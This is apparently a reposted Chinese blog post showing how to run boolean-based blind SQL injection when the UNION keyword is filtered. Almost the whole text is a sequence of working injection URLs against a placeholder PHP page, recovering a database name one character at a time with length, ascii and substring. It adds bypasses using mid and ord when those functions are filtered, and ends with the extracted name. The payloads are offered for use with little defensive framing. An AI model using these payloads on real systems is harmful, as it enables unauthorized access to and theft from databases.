码迷,mamicode.com
首页 > 其他好文 > 详细

过滤union 进行盲注

时间:2015-01-04 19:32:48      阅读:248      评论:0      收藏:0      [点我收藏+]

标签:database


http://www.x.com/sections_intr.php?id=181 and length((database()))=4


http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),1,1))=122   


http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),2,1))=122 


http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),3,1))=102 


http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),4,1))=121 


或者使用   


substring过滤的时候替换

http://www.x.com/sections_intr.php?id=181 and  ascii(mid(database(),1,1)) =122


ascii过滤的时候替换

http://www.x.com/sections_intr.php?id=181 and  ord(mid(database(),1,1))=122





122=z  102=f  121=y


库名:zzfy

ascii码表 http://app.baidu.com/app/enter?appid=218548

本文出自 “0x007” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1599005

过滤union 进行盲注

标签:database

原文地址:http://0x007.blog.51cto.com/6330498/1599005

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!